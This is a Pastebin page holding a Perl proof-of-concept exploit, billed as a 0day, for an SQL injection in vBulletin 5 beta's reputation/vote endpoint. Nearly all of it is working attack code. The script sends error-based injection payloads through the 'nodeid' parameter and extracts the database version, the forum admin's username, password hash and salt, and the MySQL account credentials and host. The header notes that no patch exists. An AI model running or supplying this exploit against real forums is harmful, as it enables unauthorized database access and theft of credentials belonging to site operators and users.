Googleinurl

vBulletin 5.0.0 Beta 28: 0day

Dec 14th, 2013
693
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. ###################################################################################
  3. #                                                           Satuday, March 30, 2013
  4. #
  5. #
  6. #
  7. #                    _  _  .__                .__              
  8. #                 __| || |_|  |   ____   ____ |__| ____   ____  
  9. #                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \
  10. #                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
  11. #                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
  12. #                   |_||_|           \/_____/                \/
  13. #                                    http://www.zempirians.com
  14. #
  15. #          00100011 01101100 01100101 01100111 01101001 01101111 01101110
  16. #
  17. #
  18. #      
  19. #                       [P]roof [o]f [C]oncept, SQL Injection
  20. #     vBulletinâ„¢ is the world leader in forum and community publishing software.
  21. #
  22. #
  23. #
  24. ###################################################################################
  25. #                                                           #      T E A M        #
  26. #                                                           #######################
  27. #
  28. # UberLame .......> Provided all proper payloads
  29. # Stealth ........> Thanks ;)
  30. #
  31. ###################################################################################
  32. #  SUMMARY     #
  33. ################
  34. #
  35. # http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
  36. #
  37. # Database error in vBulletin 5.0.0 Beta 28:
  38. # MySQL Error   : Duplicate entry '#5.1.67#1' for key 'group_key'
  39. # Error Number  : 1062
  40. # Request Date  : Saturday, March 30th 2013 @ 01:13:40 AM
  41. # Error Date    : Saturday, March 30th 2013 @ 01:13:41 AM
  42. # Script        : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
  43. #
  44. ################
  45. #  VULNERABLE  #
  46. ################
  47. #
  48. #  vBulletin 5 beta [ALL] - http://vbulletin.com
  49. #
  50. ################
  51. #  CONFIRMED   #
  52. ################
  53. #
  54. #  vBulletin 5 beta 17
  55. #  vBulletin 5 beta 28
  56. #
  57. ################
  58. #  CVE         #
  59. ################
  60. #
  61. #  There is no CVE reported.
  62. #
  63. ################
  64. #  PATCH       #
  65. ################
  66. #
  67. #  There is no PATCH available.
  68. #
  69. ###################################################################################
  70. #                          #                     #
  71. #                          #    H O W - T O      #
  72. #                          #                     #
  73. #                          #######################
  74. #
  75. # Provide the Target: Server, Folder, User, Password, Number and the script will
  76. # login and deliver the payload...
  77. #
  78. # [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
  79. #
  80. ###################################################################################
  81. use LWP::UserAgent;
  82. use HTTP::Cookies;
  83. use HTTP::Request::Common;
  84. use MIME::Base64;
  85. system $^O eq 'MSWin32' ? 'cls' : 'clear';
  86. print "
  87. ###############################################################################
  88. #'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
  89. #..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
  90. #:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
  91. #::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
  92. #:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
  93. #: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
  94. # ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
  95. #........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
  96. ###############################################################################
  97.  
  98. [?] Homepage: http://www.zempirians.com
  99. [?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
  100. [?] Effected: vBulletin 5 Beta XX SQLi 0day
  101. [?] Irc Server: irc.zempirians.com +6697
  102.  
  103. ";
  104. if (@ARGV != 5) {
  105.     print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
  106.     print "\r\n";
  107.     exit;
  108. }
  109. $host        = $ARGV[0];
  110. $path        = $ARGV[1];
  111. $username    = $ARGV[2];
  112. $password    = $ARGV[3];
  113. $magicnum    = $ARGV[4];
  114. $encpath     = encode_base64('http://'.$host.$path);
  115.  
  116. print "\n";
  117. print "[+] Establishing connection and logging in\n";
  118.  
  119. my $browser = LWP::UserAgent->new;
  120. my $cookie_jar = HTTP::Cookies->new;
  121.  
  122. my $response = $browser->post( 'http://'.$host.$path.'auth/login',
  123.     [
  124.         'url' => $encpath,
  125.         'username' => $username,
  126.         'password' => $password,
  127.     ],
  128.     Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
  129.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  130. );
  131.  
  132. $browser->cookie_jar( $cookie_jar );
  133.  
  134. print "[+] Send payload [ 1 of 4 ]\n";
  135. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  136.     [
  137.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
  138.     ],
  139.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  140. );
  141. $dataA = $response->content;
  142.     if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
  143.                 $fixversion = $1;
  144.                 $fixversion =~ s/\#//g;
  145.                 $fixvb = substr($dataA, 58, 23);
  146.     };
  147.  
  148. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  149.     [
  150.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
  151.     ],
  152.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  153. );
  154. $dataAB = $response->content;
  155.         if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
  156.                 $fixvbdb = $1;
  157.                 $fixvbdb =~ s/\#//g;
  158.         };
  159.  
  160.  
  161. print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
  162. print "\n";
  163.  
  164. print "[+] Send payload [ 2 of 4 ]\n";
  165. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  166.     [
  167.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  168.     ],
  169.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  170. );
  171. $dataB = $response->content;
  172.     if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
  173.         $fixuserhost = $1;
  174.         $fixuserhost =~ s/\#//g;
  175.         print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
  176.     };
  177. print "\n";
  178.  
  179. print "[+] Send payload [ 3 of 4 ]\n";
  180.  
  181. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  182.     [
  183.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  184.     ],
  185.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  186. );
  187.  
  188. $dataC = $response->content;
  189.         if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
  190.                 $fixvbuser = $1;
  191.                 $fixvbuser =~ s/\#//g;
  192.     };
  193.  
  194.  
  195. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  196.     [
  197.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  198.     ],
  199.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  200. );
  201.  
  202. $dataD = $response->content;
  203.         if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
  204.                 $fixvbpass = $1;
  205.                 $fixvbpass =~ s/\#//g;
  206.         };
  207.  
  208.  
  209. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  210.     [
  211.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  212.     ],
  213.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  214. );
  215.  
  216. $dataE = $response->content;
  217.         if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
  218.                 $fixvbsalt = $1;
  219.                 $fixvbsalt =~ s/\#//g;
  220.         };
  221.  
  222.  
  223. print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
  224. print "\n";
  225.  
  226. print "[+] Send payload [ 4 of 4 ]\n";
  227.  
  228. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  229.     [
  230.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  231.     ],
  232.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  233. );
  234.  
  235. $dataF = $response->content;
  236.         if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
  237.                 $fixsqluser = $1;
  238.                 $fixsqluser =~ s/\#//g;
  239.         };
  240.  
  241. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  242.     [
  243.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  244.     ],
  245.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  246. );
  247.  
  248. $dataG = $response->content;
  249.         if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
  250.                 $fixsqlpass = $1;
  251.                 $fixsqlpass =~ s/\#//g;
  252.         };
  253.  
  254. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
  255.     [
  256.         'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
  257.     ],
  258.     User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
  259. );
  260.  
  261. $dataH = $response->content;
  262.         if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
  263.                 $fixsqlhost = $1;
  264.                 $fixsqlhost =~ s/\#//g;
  265.         };
  266.  
  267.  
  268. print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';
  269.  
  270. #print "\n\n[?] Error dump - payload 1\n\n";
  271. #print $dataAB;
  272.  
  273. print "\n\n";
  274.  
  275. exit 1;
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×